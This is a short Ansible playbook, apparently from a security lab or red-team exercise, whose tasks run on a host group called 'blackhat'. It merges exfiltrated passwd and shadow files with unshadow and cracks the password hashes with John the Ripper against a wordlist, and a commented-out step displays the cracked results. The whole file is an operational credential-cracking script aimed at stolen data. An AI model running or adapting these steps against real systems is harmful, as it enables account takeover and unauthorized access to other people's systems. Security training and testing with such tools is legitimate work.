---
- name: crack the password from LDAP
  hosts: blackhat
  tasks:
    - name: unshadow the password
      raw: sudo /usr/sbin/unshadow ~/passwd ~/shadow > ~/crack_passwd
    - name: crack the exfiltrated password
      raw: john --wordlist=~/password_wordlist ~/crack_passwd
    # - name: show cracked result
    #   raw: john --show ~/crack_passwd